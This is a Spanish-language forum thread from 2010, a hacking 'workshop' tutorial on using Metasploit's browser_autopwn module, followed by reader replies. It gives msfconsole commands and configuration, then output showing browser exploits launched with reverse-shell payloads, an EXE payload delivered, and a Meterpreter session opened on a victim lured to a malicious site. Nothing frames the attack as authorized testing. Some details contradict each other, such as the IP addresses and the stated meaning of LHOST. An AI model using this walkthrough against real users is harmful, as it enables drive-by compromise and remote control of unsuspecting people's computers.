Página 1 de 1

[Taller]Pentesting S.O. parte VI

Publicado: 25 Jul 2010, 08:31
por shiva-sheva
+Temario
-+Modulo browser_autopwn
-+¿Como funciona?
-+Instalacion
-+Comando show options
-+Configurando browser_autopwn
-+Obteniendo sessions
-+Conclusion
  • Bueno este taller a sido muy interesante y bueno ya les
    enseñe algunso truquillos con el metasploit y bueno
    asi hay mucho smas y bueno ahora veremos otra forma
    de introducirnos en una pc y como lo haremos ?
    pues bueno ahora utilizaremos un modulo de
    metasploit creado por desarrolladores de metasploit
    egipcios jejejej
+Modulo browser_autopwn
  • Bueno estes es el modulo que utilizaremos esta vez muy efectivo por cierto
+¿Como funciona?
  • Sencillo navega y toma fingerprints antesde lanzar exploits a la victima!
    Por tanto si la victima usa mozilla no se podra explotar EI7
    ayudandonos mucho a reducir tiempo y exploits utilizables en
    la victima.
+Instalacion
  • La instalacion de este modulo que nos ofrecen los
    desarroladores de metasploit es muy sencilla.
    Primero lanzamos nuestro metasploit ya saben

Código: Seleccionar todo

sudo ./msfconsole
  • Y bueno ahora lo que tenemos qu ehacer es llamarlo y lo hacemos de esta forma!

Código: Seleccionar todo

msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > 

+Comando show options

  • Bueno ya lo llamamos ahora lanzamos el comando show options para ver que hay que configurar

Código: Seleccionar todo

msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > 
+Configurando browser_autopwn

Código: Seleccionar todo

msf auxiliary(browser_autopwn) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > 
  • Esto es basicamente lo que hay que configurar
    LHOST: la ip que vamos a escanear
    y
    URIPATH: aqui pones /

    y listo podemos correr nuestro scanner
    jejejej
    veamos
+Corriendo browser_autopwn

Código: Seleccionar todo

msf auxiliary(browser_autopwn) > run
[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.1.102...
[*] ---
...snip...
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/zCtg7oC
[*]  Local IP: http://192.168.1.102:8080/zCtg7oC
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/vTNGJx
[*]  Local IP: http://192.168.1.102:8080/vTNGJx
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/abmR33jxStsF7
[*]  Local IP: http://192.168.1.102:8080/abmR33jxStsF7
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
...snip...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/RdDDhKANpV
[*] Local IP: http://192.168.1.102:8080/RdDDhKANpV
[*] Server started.

[*] --- Done, found 11 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.102:8080/
[*] Server started.

Now all we need to do is get some poor victim to navigate to our malicious website and when they do, Browser Autopwn will target their browser based 
on its version.

[*] Request '/' from 192.168.1.128:1767
[*] Request '/?sessid=V2luZG93czpYUDp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo=' from 192.168.1.128:1767
[*] JavaScript Report: Windows:XP:undefined:en-us:x86:MSIE:6.0;SP2:
[*] No database, using targetcache instead
[*] Responding with exploits
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.1.128:1774...
[*] Sending Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability to 192.168.1.128:1775...
[*] Sending Microsoft Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.128:1774...
[*] Sending EXE payload to 192.168.1.128:1775...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:62360 -> 192.168.1.128:1798)
msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.102:62360 -> 192.168.1.108:1798

  • Y listo tenemos sessions
+Obteniendo sessions

Código: Seleccionar todo

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
+Conclusion

  • Bueno ahora ya tenemos mas metodos de intrucion en un
    sistema interesante todo lo que ofrece metasploit no?¡??
    Saludos esperen la parte VII !

Re: [Taller]Pentesting S.O. parte VI

Publicado: 25 Jul 2010, 11:28
por Slek
Muy muy Interesante!!!

Pero, esto solo funciona con IE, o también con otros navegadores??
Y con todas las versiones de IE, o solo con algunas??

Saludos!!

Re: [Taller]Pentesting S.O. parte VI

Publicado: 25 Jul 2010, 17:32
por shiva-sheva
Obvio si funciona con firefox mas con IE y claro en todas sus versiones funciona!!!!

Re: [Taller]Pentesting S.O. parte VI

Publicado: 25 Jul 2010, 18:15
por osx
te vas superando shiva! , esta de lujo el taller, esperando la parte VII

saludos

Re: [Taller]Pentesting S.O. parte VI

Publicado: 27 Jul 2010, 22:59
por LuisN2
Pero con esto se puede hacer una web que ejecute un exe nada mas visitarla o no? Porque el metaspoit es en mi pc :S

Re: [Taller]Pentesting S.O. parte VI

Publicado: 28 Jul 2010, 09:16
por shiva-sheva
Luis si quieres un respuesta mejora tu sintaxis por que no entendi nada de lo que pusiste

Re: [Taller]Pentesting S.O. parte VI

Publicado: 28 Jul 2010, 13:54
por LuisN2
Que si se puede hacer un exploit web.

Tu entras a la web y ejecuta un exe ocultamente!

Re: [Taller]Pentesting S.O. parte VI

Publicado: 28 Jul 2010, 14:05
por shiva-sheva
Sigues de necio .... Que sigas el taller esa actitud es de script kiddie nada mas quieres sabe una cosa y ya y te cierras y eres terco asi no y ademas sige el taller eso plantealo en la seccion de dudads y preguntas no me vengas con esas cosas de haz me un exploit pequeño bebe y tambien te cambio el pañl jijijijij

Re: [Taller]Pentesting S.O. parte VI

Publicado: 28 Jul 2010, 17:54
por LuisN2
A ver solo digo si se podria con esa info, no te digo que me hagas uno ni me expliques, además me he leido el tutorial!!!! Y el metasploit se hace en mi pc, no en la web!

Saludos!

Re: [Taller]Pentesting S.O. parte VI

Publicado: 14 Nov 2010, 17:52
por crsi
me tira esto al realizarlo la operacion, alguien sabe xq?
Imagen